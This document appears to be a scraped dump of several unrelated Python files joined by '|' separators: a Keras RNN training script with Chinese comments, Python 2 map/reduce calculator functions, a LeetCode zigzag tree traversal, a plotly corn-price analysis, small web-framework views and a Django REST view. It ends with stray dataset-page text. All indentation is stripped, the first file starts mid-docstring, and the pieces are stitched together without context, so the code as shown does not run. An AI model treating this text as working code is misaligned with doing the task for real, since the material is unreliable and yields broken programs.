y_test = y_set2[450:517,0]
#print(y_test[1])
#print(x_test[1])'''
################################################
#数据重采样技术,单个标签在原模块中
import 查看数据平衡
x,y= 查看数据平衡.oversamp()
x_set = np.array(x,dtype=object)
#数据打乱处理
train_set = []
for i in range(len(x)):
train_set.append([x[i],y[i]])
print(train_set[0])
random.shuffle(train_set)###数据重排
x_set1 = [e[0] for e in train_set]#特征数据
y_set1 = [f[1] for f in train_set]#标签
##训练集测试集划分
x_set2 = np.array(x_set1)
y_set2 = np.array(y_set1)
x_train = x_set2[0:550]
y_train = y_set2[0:550]
x_test = x_set2[550:]
y_test = y_set2[550:]
model = keras.models.Sequential()
# 添加一个Masking层
model.add(layers.Masking(mask_value=0.0, input_shape=(2, 2)))
# 添加一个RNN层
rnn_layer =layers.SimpleRNN(50, return_sequences=False)
model.add(rnn_layer)
#model.add(Bidirectional(LSTM(32)))
model.add(Dense(200, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(100, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(30,activation='relu'))
#多个标签
#model.add(Dense(10, activation='sigmoid'))
#单个标签
model.add(Dense(1, activation='sigmoid'))
adam = keras.optimizers.Adam(lr=0.01, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)#binary_focal_loss(gamma=2, alpha=0.25)
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['binary_accuracy']) ###,'top_k_categorical_accuracy'])#metrics.hanming_loss
model.summary()#####loss_function.multilabel_categorical_crossentropy
history = model.fit(x_train,y_train,batch_size=8, epochs=20,validation_data=(x_test,y_test))
print(model.predict(x_test[0:10]))
print(y_test[0:10])
'''# 绘制训练 & 验证的损失值和准确率(统一画图)
plt.plot(history.history['binary_accuracy'])
plt.plot(history.history['val_binary_accuracy'])
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model accuracy and loss')
plt.ylabel('Accuracy and Loss')
plt.xlabel('Epoch')
plt.legend(['train_acc', 'test_acc','train_loss','test_loss'], loc='upper left')
plt.show()'''
# 绘制双图
# 绘制训练损失值和评估
plt.plot(history.history['loss'])
plt.ylabel('test_loss_Value')
plt.xlabel('Epoch')
plt.title('Model training')
plt.legend(['test_loss'],loc = 'upper left')
plt.savefig('./train_loss.jpg')
plt.show()
plt.plot(history.history['binary_accuracy'])
plt.ylabel('test_accuracy_Value')
plt.xlabel('Epoch')
plt.title('Model training')
plt.legend(['test_accuracy'],loc = 'upper left')
plt.savefig('./train_accuracy.jpg')
plt.show()
# 绘制测试损失值和评估
plt.plot(history.history['val_binary_accuracy'])
plt.ylabel('test_accuracy_Value')
plt.xlabel('Epoch')
plt.title('Model testing')
plt.legend(['test_accuracy'],loc = 'upper left')
plt.savefig('./test_accuracy.jpg')
plt.show()
plt.plot(history.history['val_loss'])
plt.ylabel('test_loss_Value')
plt.xlabel('Epoch')
plt.title('Model testing')
plt.legend(['test_loss'],loc = 'upper left')
plt.savefig('./test_loss.jpg')
plt.show()
# 绘制测试损失值和评估
'''plt.plot(history.history['val_loss'])
plt.plot(history.history['val_binary_accuracy'])
plt.title('Model testing')
plt.ylabel('Value')
plt.xlabel('Epoch')
plt.legend(['test_loss', 'test_evaluate'], loc='upper left')
plt.show()'''
#绘制模型图
#plot_model(model, to_file='model.png')
#查看权重
'''U=model.get_weights()[0] #输入层和循环层之间的权重,维度为(20*32)
W=model.get_weights()[1] #循环层与循环层之间的权重,维度为(32*32)
bias=model.get_weights()[2] #隐藏层的偏置项,32个
print(U)
print(W)
print(bias)'''
'''acc = history.history['binary_accuracy']
loss = history.history['loss']
epochs = range(1, len(acc) + 1)
plt.title('Accuracy and Loss')
plt.plot(epochs, acc, 'red', label='Training acc')
plt.plot(epochs, loss, 'blue', label='Validation loss')
plt.legend()
plt.show()'''
|
##########################################
# Calculator Functions
##########################################
# Function1: add two lists together using Lambda and Map
# each element of list1 will be added to the corresponding element of list2
def add_lists(list1, list2):
return map(lambda x, y: x+y, list1, list2)
# Function2: subtract two lists using Lambda and Map
# each element of list2 will be subtracted from the corresponding element of list1
def subtract_lists(list1, list2):
return map(lambda x, y: x-y, list1, list2)
# Function3: divide two lists using Lambda and Map
# each element of list1 will be divided by the corresponding element of list2
def divide_lists(list1,list2):
return map(lambda x, y: x/float(y) if y!= 0 else 'nan', list1, list2)
# Function4a: calculator function to multiply two numbers
def multiply(first, second):
number_types = (int, long, float, complex)
if isinstance(first, number_types) and isinstance(second, number_types):
return first * second
else:
return 'error'
# Function4b: Adapt the above function to work with lists using Map
# each element of list1 will be multiplied by the corresponding element of list2
def multiply_list(list1, list2):
return map(multiply, list1, list2)
# Function5: get the total of a list using Reduce
# every element of the list will be summed to get an overall total
def list_total(mylist):
return reduce(lambda x, y: x+y, mylist)
# Function6: return the positive values in a list using Filter
def get_positive_vals(mylist):
return filter(lambda x: x>0, mylist)
# Function7: return a list of squares using List Comprehension
def get_squares(mylist):
return [ x**2 for x in mylist ]
# Function8: return a list of leap years using List Comprehension
# a leap year is identified as one that either divides evenly by 400
# OR it divides evenly by 4 but not by 100
def get_leapyears(mylist):
return [ x for x in mylist if ((x%400==0) or (x%4==0 and x%100!=0)) ]
# Function9: generator to return a list of leap years given a start & end year
# a leap year is identified as one that either divides evenly by 400
# OR it divides evenly by 4 but not by 100
def generate_leapyears(start, end):
for year in range(start, end+1):
if ((year%400==0) or (year%4==0 and year%100!=0)):
yield year
# Function10: generate a list of squares given a list of numbers
def generate_squares(mylist):
for x in mylist:
yield x**2
##########################################
# Calls
##########################################
print add_lists([2,5,4],[2,3,0])
print subtract_lists([2,5,4,3],[2,3,0,4])
print divide_lists([1,2,3],[2,1,0])
print multiply_list([2,5,4,3],[2,3,0,4])
print multiply_list([2,5,4,3],['mary',3,0,4])
print list_total([2,5,4,3,-6,999])
print list_total(range(1,101))
print get_positive_vals([-10,-66,999,0,2])
print get_squares([2,5,4,-2])
print get_leapyears([1600,1700,1800,1900,2000, 1992])
leaps = generate_leapyears(1900,2000)
for year in leaps:
print year,
print
squares = generate_squares(range(1,100))
for num in squares:
print num,
|
#! /usr/bin/env python
# coding: utf-8
# 请实现一个函数按照之字形顺序打印二叉树,即第一行按照从左到右的顺序打印,第二层按照从右到左的顺序打印,第三行再按照从左到右的顺序打印,其他行以此类推。
#
#
#
# 例如:
# 给定二叉树: [3,9,20,null,null,15,7],
#
# 3
# / \
# 9 20
# / \
# 15 7
#
#
# 返回其层次遍历结果:
#
# [
# [3],
# [20,9],
# [15,7]
# ]
#
#
#
#
# 提示:
#
#
# 节点总数 <= 1000
#
# Related Topics 树 广度优先搜索
# 👍 91 👎 0
# leetcode submit region begin(Prohibit modification and deletion)
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def levelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
queue = [root]
result = []
while queue:
temp = []
length = len(queue)
# 一层层遍历
for _ in range(length):
node = queue.pop(0)
temp.append(node.val)
if node.left:
queue.append(node.left)
if node.right:
queue.append(node.right)
result.append(temp)
data = []
for index, item in enumerate(result):
if index % 2 == 0:
data.append(item)
else:
data.append(item[::-1])
return data
# leetcode submit region end(Prohibit modification and deletion)
|
import pandas as pd
import numpy as np
import plotly.graph_objects as go
df = pd.read_excel('corn.xlsx', index_col=0)
#print (df.head())
#
arr = df.to_numpy()
data = arr.reshape(30, 12)
rows = data.shape[0]
cols = data.shape[1]
data_new = np.copy(data)
for x in range(0, rows):
for y in range(0, cols):
data_new[x,y] = data[x,y] - data[x,0]
#print(x,y,data[x,y],data_new[x,y])
month_avg = np.average(data_new, axis=0)
print(month_avg)
x = np.arange(12)
fig = go.Figure(data=go.Scatter(x=x, y=month_avg))
fig.show()
|
from flack.request import Request
from flack.response import Response
from flack.view import View
class Index(View):
def get(self, request: Request, *args, **kwargs):
body = self.engine.render('home.html', context={
'name': 'home'
})
return Response(body=body, headers={'Content-Type': 'text/html; charset=utf-8'})
class Blog(View):
def get(self, request: Request, *args, **kwargs):
post_id = request.GET.get('id', '')
if not post_id:
return Response(body='This is blog')
return Response(body=post_id[0])
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from rest_framework import generics
from .serializers import BucketlistSerializer
from .models import Bucketlist
#ListCreateAPIView is a generic view which provides GET (list all) and POST method handler
class CreateView(generics.ListCreateAPIView):
"""This class defines the create behavior of our rest api."""
queryset = Bucketlist.objects.all()
serializer_class = BucketlistSerializer
def perform_create(self, serializer):
"""Save the post data when creating a new bucketlist."""
serializer.save()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.